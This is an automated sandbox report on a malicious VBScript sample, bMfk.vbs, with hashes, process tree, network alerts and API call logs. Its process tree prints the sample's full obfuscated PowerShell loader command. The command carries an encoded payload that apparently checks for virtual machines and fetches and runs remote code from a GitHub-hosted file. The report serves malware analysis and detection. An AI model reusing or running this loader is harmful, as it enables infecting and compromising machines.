popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

bMfk.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 4, 2023, 9:49 a.m. May 4, 2023, 9:51 a.m.
Size 3.1KB
Type UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 93531a051fea874cac3cb8e4fdb84b7f
SHA256 b1234e61a003e8fb4cbc7989903fa338fcc12a1fc9ffb52e458f8e511f99cb8f
CRC32 CC851E4A
ssdeep 48:lJ40mZ6/+IWU/rx7JVNRFZlAQWmiFZoR8iwwNBIV0/koQB5C1yZsVyFqeYvVI3b4:lWXg+jInKsCnq/QDzjQdIrU7ofO
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\bMfk.vbs

    2556

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf

      2652

Name Response Post-Analysis Lookup
raw.githubusercontent.com
A 185.199.109.133
A 185.199.111.133
A 185.199.110.133
A 185.199.108.133
185.199.108.133
IP Address Status Action
164.124.101.2 Active Moloch
185.199.108.133 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.199.108.133:443 -> 192.168.56.101:49162 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49161 -> 185.199.108.133:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Unexpected token 'B0âœ'Câœ'âœ'PQâœ'gâœ'Ecâœ'ZQB0âœ'C0âœ'QwBpâœ'G0âœ'SQBuâœ'HMâœ
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: 'dâœ'Bhâœ'G4âœ'YwBlâœ'Câœ'âœ'dwBpâœ'G4âœ'Mwâœ'yâœ'F8âœ'YwBvâœ'G0âœ'câœ'B1âœ'HQâ
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: œ'ZQByâœ'HMâœ'eQBzâœ'HQâœ'ZQBtâœ'Dsâœ'Jâœ'B0âœ'DIâœ'Iâœ'âœ'9âœ'Câœ'âœ'Jâœ'B0âœ'
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: C4âœ'TQBhâœ'G4âœ'dQBmâœ'GEâœ'YwB0âœ'HUâœ'cgBlâœ'HIâœ'OwBpâœ'GYâœ'Iâœ'âœ'oâœ'CQâ
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: œ'dâœ'âœ'yâœ'C4âœ'QwBvâœ'G4âœ'dâœ'Bhâœ'Gkâœ'bgBzâœ'Cgâœ'JwBWâœ'E0âœ'dwBhâœ'HIâœ
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: 'ZQâœ'nâœ'Ckâœ'Iâœ'âœ'tâœ'G8âœ'cgâœ'gâœ'CQâœ'dâœ'âœ'yâœ'C4âœ'QwBvâœ'G4âœ'dâœ'Bh
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: âœ'Gkâœ'bgBzâœ'Cgâœ'JwBWâœ'Gkâœ'cgB0âœ'HUâœ'YQBsâœ'EIâœ'bwB4âœ'Ccâœ'KQâœ'gâœ'C0
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: âœ'bwByâœ'Câœ'âœ'Jâœ'B0âœ'DIâœ'LgBDâœ'G8âœ'bgB0âœ'GEâœ'aQBuâœ'HMâœ'Kâœ'âœ'nâœ'E
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: gâœ'eQBwâœ'GUâœ'cgâœ'tâœ'FYâœ'Jwâœ'pâœ'Ckâœ'Iâœ'B7âœ'Dsâœ'ZQB4âœ'Gkâœ'dâœ'âœ'7â
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: œ'H0âœ'Owâœ'kâœ'E8âœ'Wâœ'BQâœ'Hoâœ'Rwâœ'gâœ'D0âœ'Iâœ'âœ'nâœ'CUâœ'VQBXâœ'Fcâœ'cw
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: Bqâœ'CUâœ'Jwâœ'7âœ'CQâœ'QgBYâœ'Gkâœ'bwBNâœ'Câœ'âœ'PQâœ'gâœ'Ccâœ'JQBsâœ'FUâœ'cwB
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: Oâœ'FEâœ'JQâœ'nâœ'Dsâœ'WwBCâœ'Hkâœ'dâœ'Blâœ'Fsâœ'XQBdâœ'Câœ'âœ'Jâœ'BBâœ'Ggâœ'câ
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: œ'BBâœ'Fcâœ'Iâœ'âœ'9âœ'Câœ'âœ'WwBTâœ'Hkâœ'cwB0âœ'GUâœ'bQâœ'uâœ'EMâœ'bwBuâœ'HYâœ
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: 'ZQByâœ'HQâœ'XQâœ'6âœ'Doâœ'RgByâœ'G8âœ'bQBCâœ'GEâœ'cwBlâœ'DYâœ'Nâœ'BTâœ'HQâœ'cg
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: Bpâœ'G4âœ'Zwâœ'oâœ'Câœ'âœ'Jâœ'BCâœ'Fgâœ'aQBvâœ'E0âœ'LgBSâœ'GUâœ'câœ'Bsâœ'GEâœ'Y
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: wBlâœ'Cgâœ'JwCTIToâœ'kyEnâœ'Cwâœ'Iâœ'âœ'nâœ'EEâœ'Jwâœ'pâœ'Câœ'âœ'KQâœ'7âœ'Fsâœ'
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: UwB5âœ'HMâœ'dâœ'Blâœ'G0âœ'LgBBâœ'Hâœ'âœ'câœ'BEâœ'G8âœ'bQBhâœ'Gkâœ'bgBdâœ'Doâœ'O
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: gBDâœ'HUâœ'cgByâœ'GUâœ'bgB0âœ'EQâœ'bwBtâœ'GEâœ'aQBuâœ'C4âœ'Tâœ'Bvâœ'GEâœ'Zâœ'âœ
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: 'oâœ'CQâœ'QQBoâœ'Hâœ'âœ'QQBXâœ'Ckâœ'LgBHâœ'GUâœ'dâœ'BUâœ'Hkâœ'câœ'Blâœ'Cgâœ'JwB
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: Dâœ'Gwâœ'YQBzâœ'HMâœ'Tâœ'Bpâœ'GIâœ'cgBhâœ'HIâœ'eQâœ'zâœ'C4âœ'QwBsâœ'GEâœ'cwBzâœ
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: 'DEâœ'Jwâœ'pâœ'C4âœ'RwBlâœ'HQâœ'TQBlâœ'HQâœ'aâœ'Bvâœ'GQâœ'Kâœ'âœ'nâœ'Hâœ'âœ'cgB
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: Gâœ'FYâœ'SQâœ'nâœ'Ckâœ'LgBJâœ'G4âœ'dgBvâœ'Gsâœ'ZQâœ'oâœ'CQâœ'bgB1âœ'Gwâœ'bâœ'âœ
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: 'sâœ'Câœ'âœ'WwBvâœ'GIâœ'agBlâœ'GMâœ'dâœ'Bbâœ'F0âœ'XQâœ'gâœ'Cgâœ'Jwâœ'0âœ'DYâœ'Z
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: QBzâœ'GEâœ'QgByâœ'GUâœ'dgByâœ'GUâœ'Uwâœ'vâœ'G4âœ'aQBhâœ'G0âœ'LwByâœ'GUâœ'dâœ'Bw
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: âœ'Hkâœ'cgBjâœ'Hâœ'âœ'VQâœ'vâœ'Dgâœ'Nwâœ'1âœ'DEâœ'bwBhâœ'G8âœ'agBQâœ'C8âœ'bQBvâ
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: œ'GMâœ'LgB0âœ'G4âœ'ZQB0âœ'G4âœ'bwBjâœ'HIâœ'ZQBzâœ'HUâœ'YgB1âœ'Ggâœ'dâœ'Bpâœ'Gcâ
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: œ'LgB3âœ'GEâœ'cgâœ'vâœ'C8âœ'OgBzâœ'Hâœ'âœ'dâœ'B0âœ'Ggâœ'Jwâœ'gâœ'Cwâœ'Iâœ'âœ'kâ
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: œ'E8âœ'Wâœ'BQâœ'Hoâœ'Rwâœ'gâœ'Cwâœ'Iâœ'âœ'nâœ'FQâœ'cgB1âœ'GUâœ'Jwâœ'gâœ'Ckâœ'Iâ
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: œ'âœ'pâœ'âœ'=='' in expression or statement.
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: At line:1 char:2224
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: + $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: ✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: ✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑Z
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: Q✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bhâœ
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: ‘Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0âœ
console_handle: 0x000001d3
1 1 0

WriteConsoleW

 buffer: ‘bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Egâ
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: œ‘eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑
console_handle: 0x000001eb
1 1 0

WriteConsoleW

 buffer: H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq
console_handle: 0x000001f7
1 1 0

WriteConsoleW

 buffer: ✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBOâ
console_handle: 0x00000203
1 1 0

WriteConsoleW

 buffer: œ‘FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑
console_handle: 0x0000020f
1 1 0

WriteConsoleW

 buffer: BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑Z
console_handle: 0x0000021b
1 1 0

WriteConsoleW

 buffer: QBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp
console_handle: 0x00000227
1 1 0

WriteConsoleW

 buffer: ✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwB
console_handle: 0x00000233
1 1 0

WriteConsoleW

 buffer: l✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑Uw
console_handle: 0x0000023f
1 1 0

WriteConsoleW

 buffer: B5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgB
console_handle: 0x0000024b
1 1 0

WriteConsoleW

 buffer: D✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o
console_handle: 0x00000257
1 1 0

WriteConsoleW

 buffer: ✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBDâ
console_handle: 0x00000263
1 1 0

WriteConsoleW

 buffer: œ‘Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑D
console_handle: 0x0000026f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004548b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00454838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00454838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00454838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004550f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
